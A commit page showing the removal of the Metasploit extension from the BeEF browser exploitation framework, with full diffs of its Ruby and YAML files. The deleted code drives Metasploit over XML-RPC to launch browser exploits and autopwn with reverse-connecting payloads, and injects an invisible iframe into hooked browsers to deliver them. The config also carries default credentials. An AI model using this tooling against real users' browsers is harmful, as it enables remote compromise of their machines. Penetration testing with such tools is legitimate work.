Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Removing old Metasploit extension

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1258 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
passbe
2011-09-02 23:58:55 +00:00
parent 0403ea0853
commit 97b244d61a
6 changed files with 0 additions and 648 deletions
Download Patch File Download Diff File Expand all files Collapse all files

33
extensions/metasploit/config.yaml
View File

@@ -1,33 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load xmlrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
beef:
extension:
metasploit:
name: 'Metasploit'
enable: true
host: "127.0.0.1"
url-path: "/RPC2"
port: 55553
user: "msf"
pass: "abc123"
callback_host: "192.168.84.1"
autopwn_url: "autopwn"

96
extensions/metasploit/dbmigration.rb
View File

@@ -1,96 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
module DbMigration
extend BeEF::API::Migration
def self.migrate_commands
msf = BeEF::Extension::Metasploit::RpcClient.instance
# verify that metasploit is enabled and we are logged in.
if(msf.is_enabled && msf.login())
Thread.new() {
begin
sploits = msf.browser_exploits()
sploits.each do |sploit|
if not BeEF::Core::Models::CommandModule.first(:name => sploit)
mod = BeEF::Core::Models::CommandModule.new(:path => "Dynamic/Msf", :name => sploit)
mod.save
if mod.dynamic_command_info == nil
msfi = msf.get_exploit_info(sploit)
st = sploit.split('/').first
targets = []
os_name = BeEF::Core::Constants::Os::match_os(st)
browsers = BeEF::Core::Constants::Browsers::match_browser(msfi['name'] + msfi['targets'].to_json)
targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0
browsers.each do |bn|
targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
}
end
targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING}
msfci = BeEF::Core::Models::DynamicCommandInfo.new(
:name => msfi['name'],
:description => msfi['description'],
:targets => targets.to_json)
mod.dynamic_command_info = msfci
mod.save
end
end
end
payloads = msf.payloads()
payloads.each do |payload|
if not BeEF::Core::Models::DynamicPayloads.first( :name => payload)
pl = BeEF::Core::Models::DynamicPayloads.new( :name => payload)
pl.save
opts = msf.payload_options(payload)
opts.keys.each do |opt|
next if opts[opt]['advanced'] or opts[opt]['evasion']
pl.dynamic_payload_info.new(:name => opt, :description => opts[opt]['desc'], :required => opts[opt]['required'], :value => opts[opt]['default'])
end
pl.save
end
end
# Catching and printing exceptions in regards to migration
# of Metasploit exploits into BeEF
rescue Exception => e
puts e.message
puts e.backtrace
end
msf.launch_autopwn()
}#thread end
end
end
end
end
end
end

33
extensions/metasploit/extension.rb
View File

@@ -1,33 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
extend BeEF::API::Extension
@short_name = @full_name = 'metasploit'
@description = 'use metasploit exploits with beef'
end
end
end
require 'extensions/metasploit/filters'
require 'extensions/metasploit/rpcclient'
require 'extensions/metasploit/msfcommand'
require 'extensions/metasploit/dbmigration'

28
extensions/metasploit/filters.rb
View File

@@ -1,28 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# We extend the default filters to include the filters for Metasploit
#
module BeEF
module Filters
def self.is_valid_msf_payload_name?(name)
return false if only?("a-z_/", name)
true
end
end
end

228
extensions/metasploit/msfcommand.rb
View File

@@ -1,228 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Modules
module Commands
class Msf < BeEF::Core::Command
def initialize
h = {
'name' => 'Generic Metasploit Exploit',
'description' => 'This module will launch a Metasploit exploit against the host',
'category' => 'Metasploit',
'author' => ['sussurro']
}
BeEF::Core::Configuration.instance.set('beef.module.gmsf', h)
super('gmsf')
end
def callback
save({'result' => @datastore['result']})
end
#
def update_info(id)
mod = BeEF::Core::Models::CommandModule.first(:id => id)
msfinfo = nil
targets = []
if mod.dynamic_command_info == nil
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf.login()
msfinfo = msf.get_exploit_info(mod.name)
st = mod.name.split('/').first
puts "st: " + st
os_name = BeEF::Core::Constants::Os::match_os(st)
browsers = BeEF::Core::Constants::Browsers::match_browser(msfinfo['name'] + msfinfo['targets'].to_json)
targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0
browsers.each do |bn|
targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
}
end
targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING}
mod.dynamic_command_info = BeEF::Core::Models::DynamicCommandInfo.new(
:name => msfinfo['name'],
:description => msfinfo['description'],
:targets => targets.to_json)
mod.save
else
msfinfo = mod.dynamic_command_info
targets = JSON.parse(msfinfo['targets'])
end
@info['Name'] = msfinfo['name']
@info['Description'] = msfinfo['description']
@info['MsfModName'] = mod.name
@info['mod-id'] = mod.id
@info['msfid'] = mod.name
@target = targets
end
def update_data()
modname = @info['MsfModName']
msf = BeEF::Extension::Metasploit::RpcClient.instance
if not msf.is_enabled
@info['Description'] += "<BR>" + "*"*15 + "WARNING" + "*"*15 + "<BR>"
@info['Description'] += "Metasploit capapbilities have been disabled, please verify your configuration or if msf_enabled = 1 then check the BeEF console for errors"
return
end
msfoptions = msf.get_options(modname)
msfoptions.keys.each { |k|
next if msfoptions[k]['advanced'] == true
next if msfoptions[k]['evasion'] == true
@info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => msfoptions[k]['desc']}
case msfoptions[k]['type']
when "string","address","port"
msfoptions[k]['default'] = rand(32**20).to_s(32) if k == "URIPATH"
@info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || msfoptions[k]['default'])}
when "bool"
@info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k }
when "enum"
enumdata = []
msfoptions[k]['enums'].each { |e|
enumdata << [e]
}
@info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => enumdata, 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || msfoptions[k]['default'])}
end
}
msfpayloads = msf.get_payloads(modname)
return if not msfpayloads or not msfpayloads['payloads']
payloads = msfpayloads['payloads']
pl = []
pl << [(oc_value('PAYLOAD') || 'generic/shell_bind_tcp')]
payloads.each { |p|
pl << [p]
}
@info['Data'] << { 'name' => 'PAYLOAD',
'type' => 'combobox',
'anchor' => '95% -100',
'ui_label' => 'Payload',
'store_type' => 'arraystore',
'store_fields' => ['payload'],
'store_data' => pl,
'valueField' => 'payload',
'displayField' => 'payload' ,
'autoWidth' => true,
'mode' => 'local',
'reloadOnChange' => true, # reload payloads
'defaultPayload' => "generic/shell_bind_tcp", # default combobox value
'emptyText' => "select a payload..."
}
@info['Data'] << { 'name' => 'mod_id' , 'id' => 'mod_id', 'type' => 'hidden', 'value' => @info['mod-id'] }
end
def get_payload_options(payload_name)
# get payload options from metasploit
msf_xmlrpc_clinet = BeEF::Extension::Metasploit::RpcClient.instance
msf_xmlrpc_clinet.login()
payload_options = msf_xmlrpc_clinet.payload_options(payload_name)
info = {}
info['Data'] = []
payload_options.keys.each { |k|
next if payload_options[k]['advanced'] == true
next if payload_options[k]['evasion'] == true
info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => payload_options[k]['desc']}
case payload_options[k]['type']
when "string","address","port","raw","path", "integer"
payload_options[k]['default'] = "127.0.0.1" if k == "RHOST"
info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || payload_options[k]['default'])}
when "bool"
info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k }
when "enum"
info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => payload_options[k]['enums'], 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || payload_options[k]['default'])}
else
# Debug output if the payload option type isn't found
puts "K => #{k}\n"
puts "Status => #{payload_options[k]['advanced']}\n"
puts "Type => #{payload_options[k]['type']}\n"
puts payload_options[k]
end
}
# turn results into JSON
payload_options_json = []
payload_options_json[1] = JSON.parse(info.to_json)
JSON.parse(info.to_json)
end
def launch_exploit(opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf.login()
ret = msf.launch_exploit(@info['msfid'],opts)
@output = "<script>alert('#{ret['uri']}')</script>\n" if ret['result'] == 'success'
ret
end
def output
if @datastore
@datastore['command_url'] = BeEF::Core::Server.instance.get_command_url(@default_command_url)
@datastore['command_id'] = @command_id
end
return "
beef.execute(function() {
var result;
try {
var sploit = beef.dom.createInvisibleIframe();
sploit.src = '#{datastore['sploit_url']}';
} catch(e) {
for(var n in e)
result+= n + ' ' + e[n] ;
}
});"
end
def callback
content = {}
content['Exploit Results'] = @datastore['result']
save content
end
end
end
end
end

230
extensions/metasploit/rpcclient.rb
View File

@@ -1,230 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
#
# XML RPC Client for Metasploit
#
class RpcClient < ::XMLRPC::Client
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@enabled = (@config.get('beef.extension.metasploit.enable'))
return if (not @enabled)
host = @config.get('beef.extension.metasploit.host')
path = @config.get('beef.extension.metasploit.url-path')
port = @config.get('beef.extension.metasploit.port')
@un = @config.get('beef.extension.metasploit.user')
@pw = @config.get('beef.extension.metasploit.pass')
@apurl = @config.get('beef.extension.metasploit.autopwn_url') || "autopwn"
@lock = false
if(not host or not path or not port or not @un or not @pw)
print_error 'There is not enough information to initalize Metasploit connectivity at this time'
print_error 'Please check your options in config.yaml to verify that all information is present'
@enabled = false
end
@token = nil
@lastauth = nil
super(host,path,port)
end
def get_lock()
sleep 0.2 while @lock
@lock = true
end
def release_lock()
@lock = false
end
# is metasploit enabled in the configuration
def is_enabled
@enabled
end
# login into metasploit
def login
get_lock()
res = self.call("auth.login", @un ,@pw )
if(not (res and res['result'] == "success"))
@enabled = false
release_lock()
print_error 'Could not authenticate to Metasploit xmlrpc.'
return false
end
print_info 'Successful connection with Metasploit.' if not @lastauth
@token = res['token']
@lastauth = Time.now
release_lock()
true
end
# sends commands to the metasploit xml rpc server
def call(meth, *args)
return if not @enabled
if(meth != "auth.login")
self.login() if not @token
args.unshift(@token)
end
begin
super(meth, *args)
rescue Errno::ECONNREFUSED
print_error "Connection to Metasploit backend failed."
@enabled = false
return false
rescue XMLRPC::FaultException => e
if e.faultCode == 401 and meth == "auth.login"
print_error "Your username and password combination was rejected by the Metasploit backend server"
@enabled = false
elsif e.faultCode == 401
res = self.login()
else
print_error "An unknown exception has occured while talking to the Metasploit backend."
print_error "The Exception text is (#{e.faultCode} : #{e.faultString}."
print_error "Please check the Metasploit logs for more details."
end
return false
rescue Exception => e
print_error "An unknown exception (#{e}) has occured while talking to the Metasploit backend."
print_error "Please check the Metasploit logs for more details."
return false
end
end
def browser_exploits()
return if not @enabled
get_lock()
res = self.call('module.exploits')
return [] if not res or not res['modules']
mods = res['modules']
ret = []
mods.each do |m|
ret << m if(m.include? '/browser/')
end
release_lock()
ret.sort
end
def get_exploit_info(name)
return if not @enabled
get_lock()
res = self.call('module.info','exploit',name)
release_lock()
res || {}
end
def get_payloads(name)
return if not @enabled
get_lock()
res = self.call('module.compatible_payloads',name)
release_lock()
res || {}
end
def get_options(name)
return if not @enabled
get_lock()
res = self.call('module.options','exploit',name)
release_lock()
res || {}
end
def payloads()
return if not @enabled
get_lock()
res = self.call('module.payloads')
release_lock()
return {} if not res or not res['modules']
res['modules']
end
def payload_options(name)
return if not @enabled
get_lock()
res = self.call('module.options','payload',name)
release_lock
return {} if not res
res
end
def launch_exploit(exploit,opts)
return if not @enabled
get_lock()
begin
res = self.call('module.execute','exploit',exploit,opts)
rescue Exception => e
print_error "Exploit failed for #{exploit} \n"
release_lock()
return false
end
release_lock()
uri = ""
if opts['SSL']
uri += "https://"
else
uri += "http://"
end
uri += @config.get('beef.extension.metasploit.callback_host') + ":" + opts['SRVPORT'] + "/" + opts['URIPATH']
res['uri'] = uri
res
end
def launch_autopwn
return if not @enabled
opts = {
'LHOST' => @config.get('beef.extension.metasploit.callback_host') ,
'URIPATH' => @apurl
}
get_lock()
begin
res = self.call('module.execute','auxiliary','server/browser_autopwn',opts)
rescue Exception => e
print_error "Failed to launch autopwn\n"
release_lock()
return false
end
release_lock()
end
end
end
end
end